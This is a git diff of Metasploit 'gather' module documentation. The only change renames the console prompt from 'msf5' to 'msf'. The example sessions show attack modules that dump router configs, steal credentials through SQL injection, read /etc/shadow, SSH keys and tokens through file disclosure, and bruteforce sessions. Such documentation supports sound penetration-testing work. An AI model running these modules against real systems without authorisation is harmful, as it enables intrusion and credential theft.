a/documentation/modules/auxiliary/gather/cisco_rv320_config.md +++ b/documentation/modules/auxiliary/gather/cisco_rv320_config.md @@ -30,11 +30,11 @@ More context is available from [Rapid7's blog post](https://blog.rapid7.com/2019 #### Against firmware version 1.4.2.15, on the LAN interface, port 443: ``` -msf5 > -msf5 > use auxiliary/gather/cisco_rv320_config -msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1 +msf > +msf > use auxiliary/gather/cisco_rv320_config +msf auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1 RHOSTS => 192.168.1.1 -msf5 auxiliary(gather/cisco_rv320_config) > run +msf auxiliary(gather/cisco_rv320_config) > run [+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt [*] Scanned 1 of 1 hosts (100% complete) @@ -44,15 +44,15 @@ msf5 auxiliary(gather/cisco_rv320_config) > run #### Against firmware version 1.4.2.15, on the WAN interface, port 8007: ``` -msf5 > -msf5 > use auxiliary/gather/cisco_rv320_config -msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 203.0.113.54 +msf > +msf > use auxiliary/gather/cisco_rv320_config +msf auxiliary(gather/cisco_rv320_config) > set RHOSTS 203.0.113.54 RHOSTS => 203.0.113.54 -msf5 auxiliary(gather/cisco_rv320_config) > set RPORT 8007 +msf auxiliary(gather/cisco_rv320_config) > set RPORT 8007 RPORT => 8007 -msf5 auxiliary(gather/cisco_rv320_config) > set SSL false +msf auxiliary(gather/cisco_rv320_config) > set SSL false SSL => false -msf5 auxiliary(gather/cisco_rv320_config) > run +msf auxiliary(gather/cisco_rv320_config) > run [+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_203.0.113.54_cisco.rv.config_434637.txt [*] Scanned 1 of 1 hosts (100% complete) @@ -62,11 +62,11 @@ msf5 auxiliary(gather/cisco_rv320_config) > run #### Against firmware version 1.4.2.17, on the LAN interface, port 443: ``` -msf5 > -msf5 > use auxiliary/gather/cisco_rv320_config -msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1 +msf > +msf > use auxiliary/gather/cisco_rv320_config +msf auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1 RHOSTS => 192.168.1.1 -msf5 auxiliary(gather/cisco_rv320_config) > run +msf auxiliary(gather/cisco_rv320_config) > run [+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt [*] Scanned 1 of 1 hosts (100% complete) @@ -76,11 +76,11 @@ msf5 auxiliary(gather/cisco_rv320_config) > run #### Against newer firmware (>= 1.4.2.19), on the LAN interface, port 443: ``` -msf5 > -msf5 > use auxiliary/gather/cisco_rv320_config -msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1 +msf > +msf > use auxiliary/gather/cisco_rv320_config +msf auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1 RHOSTS => 192.168.1.1 -msf5 auxiliary(gather/cisco_rv320_config) > run +msf auxiliary(gather/cisco_rv320_config) > run [-] Auxiliary aborted due to failure: not-vulnerable: Response suggests device is patched [*] Auxiliary module execution completed @@ -89,7 +89,7 @@ msf5 auxiliary(gather/cisco_rv320_config) > run #### If module succeeds, check the database: ``` -msf5 auxiliary(gather/cisco_rv320_config) > hosts +msf auxiliary(gather/cisco_rv320_config) > hosts Hosts ===== @@ -101,7 +101,7 @@ address mac name os_name os_flavor os_sp purpose ``` ``` -msf5 auxiliary(gather/cisco_rv320_config) > creds +msf auxiliary(gather/cisco_rv320_config) > creds Credentials =========== @@ -112,7 +112,7 @@ host origin service public private ``` ``` -msf5 auxiliary(gather/cisco_rv320_config) > loot +msf auxiliary(gather/cisco_rv320_config) > loot Loot ==== diff --git a/documentation/modules/auxiliary/gather/cloud_lookup.md b/documentation/modules/auxiliary/gather/cloud_lookup.md index 73f11b2404..992883a78d 100644 --- a/documentation/modules/auxiliary/gather/cloud_lookup.md +++ b/documentation/modules/auxiliary/gather/cloud_lookup.md @@ -34,9 +34,9 @@ You can use a custom string to perform the comparison. This is the hostname [fqdn] on which the website responds. But this can also be a domain. -msf5 auxiliary(gather/cloud_lookup) > set hostname www.zataz.com +msf auxiliary(gather/cloud_lookup) > set hostname www.zataz.com --or-- -msf5 auxiliary(gather/cloud_lookup) > set hostname discordapp.com +msf auxiliary(gather/cloud_lookup) > set hostname discordapp.com ### IPBLACKLIST_FILE @@ -85,9 +85,9 @@ HTTP(s) request timeout. Default: 8 If successful, you must be able to obtain the IP(s) address of the website as follows: ``` -msf5 auxiliary(gather/cloud_lookup) > set verbose true +msf auxiliary(gather/cloud_lookup) > set verbose true verbose => true -msf5 auxiliary(gather/cloud_lookup) > run +msf auxiliary(gather/cloud_lookup) > run [*] Selected action: Amazon CloudFlare [*] Passive gathering information... @@ -124,9 +124,9 @@ parameter of the HTTP header. For example: ``` -msf5 auxiliary(gather/cloud_lookup) > set hostname www.exodata.fr +msf auxiliary(gather/cloud_lookup) > set hostname www.exodata.fr hostname => www.exodata.fr -msf5 auxiliary(gather/cloud_lookup) > run +msf auxiliary(gather/cloud_lookup) > run [*] Selected action: Amazon CloudFlare [*] Passive gathering information... @@ -152,11 +152,11 @@ msf5 auxiliary(gather/cloud_lookup) > run *or* ``` -msf5 auxiliary(gather/cloud_lookup) > set verbose false +msf auxiliary(gather/cloud_lookup) > set verbose false verbose => false -msf5 auxiliary(gather/cloud_lookup) > set hostname www.ingensecurity.com +msf auxiliary(gather/cloud_lookup) > set hostname www.ingensecurity.com hostname => www.ingensecurity.com -msf5 auxiliary(gather/cloud_lookup) > run +msf auxiliary(gather/cloud_lookup) > run [*] Passive gathering information... [*] * ViewDNS.info: 2 IP address found(s). @@ -182,30 +182,30 @@ a page other than the index page. For example: ``` -msf5 > use auxiliary/gather/cloud_lookup -msf5 auxiliary(gather/cloud_lookup) > set HOSTNAME www.zataz.com +msf > use auxiliary/gather/cloud_lookup +msf auxiliary(gather/cloud_lookup) > set HOSTNAME www.zataz.com hostname => www.zataz.com -msf5 auxiliary(gather/cloud_lookup) > set URIPATH /contacter/ +msf auxiliary(gather/cloud_lookup) > set URIPATH /contacter/ uripath => /contacter/ -msf5 auxiliary(gather/cloud_lookup) > set compstr Contacter ZATAZ +msf auxiliary(gather/cloud_lookup) > set compstr Contacter ZATAZ compstr => Contacter ZATAZ -msf5 auxiliary(gather/cloud_lookup) > run +msf auxiliary(gather/cloud_lookup) > run ... ``` *or* ``` -msf5 > use auxiliary/gather/cloud_lookup -msf5 auxiliary(gather/cloud_lookup) > set HOSTNAME www.zataz.com +msf > use auxiliary/gather/cloud_lookup +msf auxiliary(gather/cloud_lookup) > set HOSTNAME www.zataz.com hostname => www.zataz.com -msf5 auxiliary(gather/cloud_lookup) > set URIPATH /contacter/ +msf auxiliary(gather/cloud_lookup) > set URIPATH /contacter/ uripath => /contacter/ -msf5 auxiliary(gather/cloud_lookup) > set compstr Contacter ZATAZ +msf auxiliary(gather/cloud_lookup) > set compstr Contacter ZATAZ compstr => Contacter ZATAZ -msf5 auxiliary(gather/cloud_lookup) > set tag html +msf auxiliary(gather/cloud_lookup) > set tag html tag => html -msf5 auxiliary(gather/cloud_lookup) > run +msf auxiliary(gather/cloud_lookup) > run ... ``` diff --git a/documentation/modules/auxiliary/gather/dolibarr_list_creds_sqli.md b/documentation/modules/auxiliary/gather/dolibarr_list_creds_sqli.md index e1358573bd..af18ccbfec 100644 --- a/documentation/modules/auxiliary/gather/dolibarr_list_creds_sqli.md +++ b/documentation/modules/auxiliary/gather/dolibarr_list_creds_sqli.md @@ -26,16 +26,16 @@ ``` - msf5 > use auxiliary/gather/dolibarr_list_creds_sqli - msf5 auxiliary(gather/dolibarr_list_creds_sqli) > set username test + msf > use auxiliary/gather/dolibarr_list_creds_sqli + msf auxiliary(gather/dolibarr_list_creds_sqli) > set username test username => test - msf5 auxiliary(gather/dolibarr_list_creds_sqli) > set password blah + msf auxiliary(gather/dolibarr_list_creds_sqli) > set password blah password => blah - msf5 auxiliary(gather/dolibarr_list_creds_sqli) > set targeturi /dolibarr + msf auxiliary(gather/dolibarr_list_creds_sqli) > set targeturi /dolibarr targeturi => /dolibarr - msf5 auxiliary(gather/dolibarr_list_creds_sqli) > set rhosts 192.168.37.228 + msf auxiliary(gather/dolibarr_list_creds_sqli) > set rhosts 192.168.37.228 rhosts => 192.168.37.228 - msf5 auxiliary(gather/dolibarr_list_creds_sqli) > run + msf auxiliary(gather/dolibarr_list_creds_sqli) > run [*] Logging in... [+] Successfully logged into Dolibarr diff --git a/documentation/modules/auxiliary/gather/f5_bigip_cookie_disclosure.md b/documentation/modules/auxiliary/gather/f5_bigip_cookie_disclosure.md index 7afaf2dc87..f2b210231e 100644 --- a/documentation/modules/auxiliary/gather/f5_bigip_cookie_disclosure.md +++ b/documentation/modules/auxiliary/gather/f5_bigip_cookie_disclosure.md @@ -21,25 +21,25 @@ and backend servers' IP addresses and ports) through cookies inserted by the BIG ### F5 BIP-IP load balancing cookie not found ``` -msf5 > use auxiliary/gather/f5_bigip_cookie_disclosure -msf5 auxiliary(gather/f5_bigip_cookie_disclosure) > set RHOSTS www.example.com +msf > use auxiliary/gather/f5_bigip_cookie_disclosure +msf auxiliary(gather/f5_bigip_cookie_disclosure) > set RHOSTS www.example.com RHOSTS => www.example.com -msf5 auxiliary(gather/f5_bigip_cookie_disclosure) > run +msf auxiliary(gather/f5_bigip_cookie_disclosure) > run [*] Running module against 93.184.216.34 [*] Starting request / [-] F5 BIG-IP load balancing cookie not found [*] Auxiliary module execution completed -msf5 auxiliary(gather/f5_bigip_cookie_disclosure) > +msf auxiliary(gather/f5_bigip_cookie_disclosure) > ``` ### F5 BIP-IP load balancing cookie found ``` -msf5 > use auxiliary/gather/f5_bigip_cookie_disclosure -msf5 auxiliary(gather/f5_bigip_cookie_disclosure) > set RHOSTS vulnerable-target.com +msf > use auxiliary/gather/f5_bigip_cookie_disclosure +msf auxiliary(gather/f5_bigip_cookie_disclosure) > set RHOSTS vulnerable-target.com RHOSTS => vulnerable-target.com -msf5 auxiliary(gather/f5_bigip_cookie_disclosure) > run +msf auxiliary(gather/f5_bigip_cookie_disclosure) > run [*] Running module against 1.1.1.1 [*] Starting request / @@ -47,7 +47,7 @@ msf5 auxiliary(gather/f5_bigip_cookie_disclosure) > run [+] Load balancing pool name "~DMZ~EXAMPLE~vulnarable-target-443_pool" found [+] Backend 10.1.105.72:443 found [*] Auxiliary module execution completed -msf5 auxiliary(gather/f5_bigip_cookie_disclosure) > notes +msf auxiliary(gather/f5_bigip_cookie_disclosure) > notes Notes ===== @@ -57,5 +57,5 @@ Notes 2019-08-20 21:21:02 UTC 1.1.1.1 f5_load_balancer_cookie_name "BIGipServer~DMZ~EXAMPLE~vulnarable-target-443_pool" 2019-08-20 21:21:02 UTC 1.1.1.1 f5_load_balancer_pool_name "~DMZ~EXAMPLE~vulnarable-target-443_pool" 2019-08-20 21:21:02 UTC 1.1.1.1 f5_load_balancer_backends [{:host=>"10.1.105.72", :port=>443}] -msf5 auxiliary(gather/f5_bigip_cookie_disclosure) > +msf auxiliary(gather/f5_bigip_cookie_disclosure) > ``` diff --git a/documentation/modules/auxiliary/gather/ibm_bigfix_sites_packages_enum.md b/documentation/modules/auxiliary/gather/ibm_bigfix_sites_packages_enum.md index fa8503b249..02cd8daee8 100644 --- a/documentation/modules/auxiliary/gather/ibm_bigfix_sites_packages_enum.md +++ b/documentation/modules/auxiliary/gather/ibm_bigfix_sites_packages_enum.md @@ -40,10 +40,10 @@ Default false. Show full URL for the packages instead of the filename. ### Relay Version 9.5.10.79 ``` -msf5 > use auxiliary/gather/ibm_bigfix_sites_packages_enum -msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) > set rhosts +msf > use auxiliary/gather/ibm_bigfix_sites_packages_enum +msf auxiliary(gather/ibm_bigfix_sites_packages_enum) > set rhosts rhosts => -msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) > exploit +msf auxiliary(gather/ibm_bigfix_sites_packages_enum) > exploit [*] Running module against [IP] [+] [Organization] @@ -62,5 +62,5 @@ msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) > exploit [+] File: [package name] [*] Auxiliary module execution completed -msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) > +msf auxiliary(gather/ibm_bigfix_sites_packages_enum) > ``` diff --git a/documentation/modules/auxiliary/gather/ipcamera_password_disclosure.md b/documentation/modules/auxiliary/gather/ipcamera_password_disclosure.md index dad04fc824..318f4ed3b2 100644 --- a/documentation/modules/auxiliary/gather/ipcamera_password_disclosure.md +++ b/documentation/modules/auxiliary/gather/ipcamera_password_disclosure.md @@ -51,10 +51,10 @@ if ($Q::query == "ADMINID") { ### Against the Mock page listed above ``` - msf5 > use auxiliary/gather/ipcamera_password_disclosure - msf5 auxiliary(gather/ipcamera_password_disclosure) > set rhosts 127.0.0.1 + msf > use auxiliary/gather/ipcamera_password_disclosure + msf auxiliary(gather/ipcamera_password_disclosure) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 - msf5 auxiliary(gather/ipcamera_password_disclosure) > run + msf auxiliary(gather/ipcamera_password_disclosure) > run [+] Found: admin:password [*] Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/gather/ldap_passwords.md b/documentation/modules/auxiliary/gather/ldap_passwords.md index cd74df1ef8..92440a131b 100644 --- a/documentation/modules/auxiliary/gather/ldap_passwords.md +++ b/documentation/modules/auxiliary/gather/ldap_passwords.md @@ -125,7 +125,7 @@ msf auxiliary(gather/ldap_passwords) > run msf auxiliary(gather/ldap_passwords) > set RHOSTS 192.0.2.1 RHOSTS => 192.0.2.1 -msf5 auxiliary(gather/ldap_passwords) > run +msf auxiliary(gather/ldap_passwords) > run [*] Running module against 192.0.2.1 [*] Discovered base DN: dc=server,dc=nas diff --git a/documentation/modules/auxiliary/gather/mikrotik_winbox_fileread.md b/documentation/modules/auxiliary/gather/mikrotik_winbox_fileread.md index 22e8acea09..28197ac747 100644 --- a/documentation/modules/auxiliary/gather/mikrotik_winbox_fileread.md +++ b/documentation/modules/auxiliary/gather/mikrotik_winbox_fileread.md @@ -42,10 +42,10 @@ Add a user ### Mikrotik Cloud Router RouterOS 6.40.4 ``` -msf5 > use auxiliary/gather/mikrotik_winbox_fileread -msf5 auxiliary(gather/mikrotik_winbox_fileread) > set rhosts 1.1.1.1 +msf > use auxiliary/gather/mikrotik_winbox_fileread +msf auxiliary(gather/mikrotik_winbox_fileread) > set rhosts 1.1.1.1 rhosts => 1.1.1.1 -msf5 auxiliary(gather/mikrotik_winbox_fileread) > run +msf auxiliary(gather/mikrotik_winbox_fileread) > run [*] Running for 1.1.1.1... [*] 1.1.1.1 - Session ID: 54 diff --git a/documentation/modules/auxiliary/gather/nuuo_cms_bruteforce.md b/documentation/modules/auxiliary/gather/nuuo_cms_bruteforce.md index d52b423f14..ef56e3fbcb 100644 --- a/documentation/modules/auxiliary/gather/nuuo_cms_bruteforce.md +++ b/documentation/modules/auxiliary/gather/nuuo_cms_bruteforce.md @@ -60,14 +60,14 @@ It is worth noticing that when a user logs in, the session has to be maintained ### Tested on Windows 10 Pro x64 running NCS Server v2.1.0 ``` -msf5 auxiliary(gather/nuuo_cms_bruteforce) > set rhosts 172.22.222.200 +msf auxiliary(gather/nuuo_cms_bruteforce) > set rhosts 172.22.222.200 rhosts => 172.22.222.200 -msf5 auxiliary(gather/nuuo_cms_bruteforce) > exploit +msf auxiliary(gather/nuuo_cms_bruteforce) > exploit [*] 172.22.222.200:5180 - Bruteforcing session - this might take a while, go get some coffee! [*] 172.22.222.200:5180 - Generating 2621440 session tokens [+] 172.22.222.200:5180 - Found valid user session: 42094216 [*] 172.22.222.200:5180 - Time taken: 1384.588721601991 seconds; total tries 590893 [*] Auxiliary module execution completed -msf5 auxiliary(gather/nuuo_cms_bruteforce) > +msf auxiliary(gather/nuuo_cms_bruteforce) > ``` diff --git a/documentation/modules/auxiliary/gather/nuuo_cms_file_download.md b/documentation/modules/auxiliary/gather/nuuo_cms_file_download.md index 9e3eaf8394..3759ac04bb 100644 --- a/documentation/modules/auxiliary/gather/nuuo_cms_file_download.md +++ b/documentation/modules/auxiliary/gather/nuuo_cms_file_download.md @@ -46,9 +46,9 @@ The following versions were tested: ### Tested on Windows 10 Pro x64 running NCS Server 2.4.0 ``` -msf5 auxiliary(gather/nuuo_cms_file_download) > set rhosts 172.22.222.200 +msf auxiliary(gather/nuuo_cms_file_download) > set rhosts 172.22.222.200 rhosts => 172.22.222.200 -msf5 auxiliary(gather/nuuo_cms_file_download) > exploit +msf auxiliary(gather/nuuo_cms_file_download) > exploit [+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_CMServer.cfg_227185.cfg [+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_ServerConfig.cfg_050084.cfg @@ -59,5 +59,5 @@ msf5 auxiliary(gather/nuuo_cms_file_download) > exploit [*] 172.22.222.200:5180 - password NUCMS2007! to unzip them. [*] 172.22.222.200:5180 - Annoy the Metasploit developers until this gets fixed! [*] Auxiliary module execution completed -msf5 auxiliary(gather/nuuo_cms_file_download) > +msf auxiliary(gather/nuuo_cms_file_download) > ``` diff --git a/documentation/modules/auxiliary/gather/oats_downloadservlet_traversal.md b/documentation/modules/auxiliary/gather/oats_downloadservlet_traversal.md index b3079c093d..c6a269c61b 100644 --- a/documentation/modules/auxiliary/gather/oats_downloadservlet_traversal.md +++ b/documentation/modules/auxiliary/gather/oats_downloadservlet_traversal.md @@ -54,7 +54,7 @@ Special thanks to Steven Seeley to assist on the development of the Metasploit m ## Scenarios ``` -msf5 auxiliary(gather/oats_downloadservlet_traversal) > run +msf auxiliary(gather/oats_downloadservlet_traversal) > run [*] Running module against 172.16.249.143 @@ -75,5 +75,5 @@ msf5 auxiliary(gather/oats_downloadservlet_traversal) > run [*] Auxiliary module execution completed -msf5 auxiliary(gather/oats_downloadservlet_traversal) > +msf auxiliary(gather/oats_downloadservlet_traversal) > ``` diff --git a/documentation/modules/auxiliary/gather/office365userenum.md b/documentation/modules/auxiliary/gather/office365userenum.md index 93444ed141..461923dd85 100644 --- a/documentation/modules/auxiliary/gather/office365userenum.md +++ b/documentation/modules/auxiliary/gather/office365userenum.md @@ -46,9 +46,9 @@ The following demonstrates basic usage, using the supplied users wordlist and default options. ``` -msf5 auxiliary(gather/office365userenum) > set users /home/msfdev/users +msf auxiliary(gather/office365userenum) > set users /home/msfdev/users users => /home/msfdev/users -msf5 auxiliary(gather/office365userenum) > run +msf auxiliary(gather/office365userenum) > run [*] diff --git a/documentation/modules/auxiliary/gather/peplink_bauth_sqli.md b/documentation/modules/auxiliary/gather/peplink_bauth_sqli.md index deb810183f..6fc36bf6e5 100644 --- a/documentation/modules/auxiliary/gather/peplink_bauth_sqli.md +++ b/documentation/modules/auxiliary/gather/peplink_bauth_sqli.md @@ -50,8 +50,8 @@ Refer to its installation guide, use a free Solo license. BypassLogin: ``` -msf5 auxiliary(gather/peplink_bauth_sqli) > set BypassLogin true -msf5 auxiliary(gather/peplink_bauth_sqli) > run +msf auxiliary(gather/peplink_bauth_sqli) > set BypassLogin true +msf auxiliary(gather/peplink_bauth_sqli) > run [*] Running module against 192.168.1.254 [+] Target seems to be vulnerable @@ -84,7 +84,7 @@ msf5 auxiliary(gather/peplink_bauth_sqli) > run [*] Retrieving mvpn_summary [+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkmvpn_sum_261747.txt [*] Auxiliary module execution completed -msf5 auxiliary(gather/peplink_bauth_sqli) > +msf auxiliary(gather/peplink_bauth_sqli) > ``` The config is a .tar.gz archive with an added 36-byte header, you can extract the plaintext config: @@ -122,11 +122,11 @@ LEFTTIME_USAGE="yes" EnumPrivs and EnumUsernames: ``` -msf5 auxiliary(sqli/peplink_bauth_sqli) > set EnumPrivs true +msf auxiliary(sqli/peplink_bauth_sqli) > set EnumPrivs true EnumPrivs => true -msf5 auxiliary(sqli/peplink_bauth_sqli) > set EnumUsernames true +msf auxiliary(sqli/peplink_bauth_sqli) > set EnumUsernames true EnumUsernames => true -msf5 auxiliary(sqli/peplink_bauth_sqli) > run +msf auxiliary(sqli/peplink_bauth_sqli) > run [*] Running module against 192.168.1.254 [+] Target seems vulnerable @@ -140,7 +140,7 @@ msf5 auxiliary(sqli/peplink_bauth_sqli) > run ... [*] Auxiliary module execution completed -msf5 auxiliary(sqli/peplink_bauth_sqli) > +msf auxiliary(sqli/peplink_bauth_sqli) > ``` Verbose: @@ -148,9 +148,9 @@ Verbose: When you enable verbose, you get the parsed XML document displayed. ``` -msf5 auxiliary(gather/peplink_bauth_sqli) > set Verbose true -msf5 auxiliary(gather/peplink_bauth_sqli) > set BypassLogin true -msf5 auxiliary(gather/peplink_bauth_sqli) > run +msf auxiliary(gather/peplink_bauth_sqli) > set Verbose true +msf auxiliary(gather/peplink_bauth_sqli) > set BypassLogin true +msf auxiliary(gather/peplink_bauth_sqli) > run [*] Running module against 192.168.1.254 [+] Target seems to be vulnerable @@ -397,13 +397,13 @@ msf5 auxiliary(gather/peplink_bauth_sqli) > run [+] WAN Port Unavailable [+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkmvpn_sum_970830.txt [*] Auxiliary module execution completed -msf5 auxiliary(gather/peplink_bauth_sqli) > +msf auxiliary(gather/peplink_bauth_sqli) > ``` Loot: ``` -msf5 auxiliary(gather/peplink_bauth_sqli) > loot +msf auxiliary(gather/peplink_bauth_sqli) > loot Loot ==== @@ -425,6 +425,6 @@ host service type name content 192.168.1.254 peplink cert_info text/xml /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkcert_inf_765605.txt 192.168.1.254 peplink mvpn_summary text/xml /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkmvpn_sum_890141.txt -msf5 auxiliary(gather/peplink_bauth_sqli) > +msf auxiliary(gather/peplink_bauth_sqli) > ``` diff --git a/documentation/modules/auxiliary/gather/pimcore_creds_sqli.md b/documentation/modules/auxiliary/gather/pimcore_creds_sqli.md index d2e9d1b47d..353f243d5e 100644 --- a/documentation/modules/auxiliary/gather/pimcore_creds_sqli.md +++ b/documentation/modules/auxiliary/gather/pimcore_creds_sqli.md @@ -48,12 +48,12 @@ wvu@kharak:~$ ### Tested on Ubuntu 18.04.1 Running Pimcore v5.2.3 ``` -msf5 > use auxiliary/gather/pimcore_creds_sqli -msf5 auxiliary(gather/pimcore_creds_sqli) > set rhosts 192.168.37.246 +msf > use auxiliary/gather/pimcore_creds_sqli +msf auxiliary(gather/pimcore_creds_sqli) > set rhosts 192.168.37.246 rhosts => 192.168.37.246 -msf5 auxiliary(gather/pimcore_creds_sqli) > set apikey 77369eee2b728e0efbb2c296549aea09b91d3751c26a3c27ce0b1dbb6bfaf11b +msf auxiliary(gather/pimcore_creds_sqli) > set apikey 77369eee2b728e0efbb2c296549aea09b91d3751c26a3c27ce0b1dbb6bfaf11b apikey => 77369eee2b728e0efbb2c296549aea09b91d3751c26a3c27ce0b1dbb6bfaf11b -msf5 auxiliary(gather/pimcore_creds_sqli) > run +msf auxiliary(gather/pimcore_creds_sqli) > run [+] Credentials obtained: [+] admin : $2y$10$sBaD3EOAm/i1F3Mm/fwseeq3nyoacdlUt4NkVLZUgJ4FTReJSKIbe diff --git a/documentation/modules/auxiliary/gather/pulse_secure_file_disclosure.md b/documentation/modules/auxiliary/gather/pulse_secure_file_disclosure.md index d9dd8abb7e..2fa68021a0 100644 --- a/documentation/modules/auxiliary/gather/pulse_secure_file_disclosure.md +++ b/documentation/modules/auxiliary/gather/pulse_secure_file_disclosure.md @@ -40,7 +40,7 @@ Whether to print file contents to the screen. Valid only in manual mode. Dumping creds and sessions in automatic mode: ``` -msf5 auxiliary(gather/pulse_secure_file_disclosure) > run +msf auxiliary(gather/pulse_secure_file_disclosure) > run [*] Running module against [redacted] [*] Running in automatic mode @@ -61,7 +61,7 @@ msf5 auxiliary(gather/pulse_secure_file_disclosure) > run [*] Dumping /data/runtime/mtmp/system [+] /Users/wvu/.msf4/loot/20191029221851_default_[redacted]_PulseSecureVPN_530345.bin [*] Auxiliary module execution completed -msf5 auxiliary(gather/pulse_secure_file_disclosure) > loot +msf auxiliary(gather/pulse_secure_file_disclosure) > loot Loot ==== @@ -72,15 +72,15 @@ host service type name [redacted] Pulse Secure VPN Arbitrary File Disclosure /data/runtime/mtmp/lmdb/randomVal/data.mdb application/octet-stream Session IDs /Users/wvu/.msf4/loot/20191029221845_default_[redacted]_PulseSecureVPN_607925.mdb [redacted] Pulse Secure VPN Arbitrary File Disclosure /data/runtime/mtmp/system application/octet-stream Hashed credentials /Users/wvu/.msf4/loot/20191029221851_default_[redacted]_PulseSecureVPN_530345.bin -msf5 auxiliary(gather/pulse_secure_file_disclosure) > +msf auxiliary(gather/pulse_secure_file_disclosure) > ``` Dumping default `/etc/passwd` in manual mode: ``` -msf5 auxiliary(gather/pulse_secure_file_disclosure) > set action Manual +msf auxiliary(gather/pulse_secure_file_disclosure) > set action Manual action => Manual -msf5 auxiliary(gather/pulse_secure_file_disclosure) > run +msf auxiliary(gather/pulse_secure_file_disclosure) > run [*] Running module against [redacted] [*] Running in manual mode @@ -97,5 +97,5 @@ postgres:x:102:102:PostgreSQL User:/: [+] /Users/wvu/.msf4/loot/20191029222949_default_[redacted]_PulseSecureVPN_073170.bin [*] Auxiliary module execution completed -msf5 auxiliary(gather/pulse_secure_file_disclosure) > +msf auxiliary(gather/pulse_secure_file_disclosure) > ``` diff --git a/documentation/modules/auxiliary/gather/qnap_lfi.md b/documentation/modules/auxiliary/gather/qnap_lfi.md index b417796561..97eaf007a4 100644 --- a/documentation/modules/auxiliary/gather/qnap_lfi.md +++ b/documentation/modules/auxiliary/gather/qnap_lfi.md @@ -46,7 +46,7 @@ Whether to print file contents to the screen, defaults to true. #### Dumping hashes from `/etc/shadow` ``` -msf5 auxiliary(gather/qnap_lfi) > run +msf auxiliary(gather/qnap_lfi) > run [*] Running module against [REDACTED] [*] Getting the Album Id @@ -68,7 +68,7 @@ Merle:$1$JjtNtEJx$PMtCY0tpb2N/rjck2fHVI0:17438:0:99999:7::: a9d01ba7:$1$PKQtJPZZ$3RdJRQozKzdx1axJqP9Fe/:18405:0:99999:7::: [*] adding the /etc/shadow entries to the database [*] Auxiliary module execution completed -msf5 auxiliary(gather/qnap_lfi) > loot +msf auxiliary(gather/qnap_lfi) > loot Loot ==== @@ -77,7 +77,7 @@ host service type name content info path ---- ------- ---- ---- ------- ---- ---- [REDACTED] qnap.http shadow text/plain /home/redouane/.msf4/loot/20200528212705_default_[REDACTED]_qnap.http_394810.bin -msf5 auxiliary(gather/qnap_lfi) > creds +msf auxiliary(gather/qnap_lfi) > creds Credentials =========== @@ -91,7 +91,7 @@ host origin service public private re [REDACTED] Merle $1$JjtNtEJx$PMtCY0tpb2N/rjck2fHVI0 Nonreplayable hash md5crypt [REDACTED] a9d01ba7 $1$PKQtJPZZ$3RdJRQozKzdx1axJqP9Fe/ Nonreplayable hash md5crypt -msf5 auxiliary(gather/qnap_lfi) > +msf auxiliary(gather/qnap_lfi) > ``` The hashes can be used to login from the web interface, or through ssh if it's enabled. @@ -99,9 +99,9 @@ The hashes can be used to login from the web interface, or through ssh if it's e #### Dumping ssh private keys ``` -msf5 auxiliary(gather/qnap_lfi) > set FILEPATH /root/.ssh/id_rsa +msf auxiliary(gather/qnap_lfi) > set FILEPATH /root/.ssh/id_rsa FILEPATH => /root/.ssh/id_rsa -msf5 auxiliary(gather/qnap_lfi) > exploit +msf auxiliary(gather/qnap_lfi) > exploit [*] Running module against [redacted] [*] Getting the Album Id @@ -115,15 +115,15 @@ msf5 auxiliary(gather/qnap_lfi) > exploit [redacted] -----END RSA PRIVATE KEY----- [*] Auxiliary module execution completed -msf5 auxiliary(gather/qnap_lfi) > +msf auxiliary(gather/qnap_lfi) > ``` #### Retrieving the token, can be used to authenticate ``` -msf5 auxiliary(gather/qnap_lfi) > set FILEPATH /share/Multimedia/.@__thumb/ps.app.token +msf auxiliary(gather/qnap_lfi) > set FILEPATH /share/Multimedia/.@__thumb/ps.app.token FILEPATH => /share/Multimedia/.@__thumb/ps.app.token -msf5 auxiliary(gather/qnap_lfi) > exploit +msf auxiliary(gather/qnap_lfi) > exploit [*] Running module against [redacted] [*] Getting the Album Id @@ -135,7 +135,7 @@ msf5 auxiliary(gather/qnap_lfi) > exploit [+] File content: [redacted] [*] Auxiliary module execution completed -msf5 auxiliary(gather/qnap_lfi) > +msf auxiliary(gather/qnap_lfi) > ``` The token can then be used to authenticate, by sending a POST request to the uri `/cgi-bin/authLogin.cgi`, for the example above: @@ -147,7 +147,7 @@ This would return an `authSid`, that can be used with most endpoints that requir ### QNAP QTS 4.3.6 with Photo Station 5.7.9 ``` -msf5 auxiliary(gather/qnap_lfi) > show options +msf auxiliary(gather/qnap_lfi) > show options Module options (auxiliary/gather/qnap_lfi): @@ -171,7 +171,7 @@ Auxiliary action: Download Download the file at FILEPATH -msf5 auxiliary(gather/qnap_lfi) > run +msf auxiliary(gather/qnap_lfi) > run [*] Running module against 192.168.250.5 [*] Getting the Album Id @@ -189,5 +189,5 @@ proc /proc proc defaults 0 0 none /dev/pts devpts gid=5,mode=620 0 0 [*] Auxiliary module execution completed -msf5 auxiliary(gather/qnap_lfi) > +msf auxiliary(gather/qnap_lfi) > ``` diff --git a/documentation/modules/auxiliary/gather/rails_doubletap_file_read.md 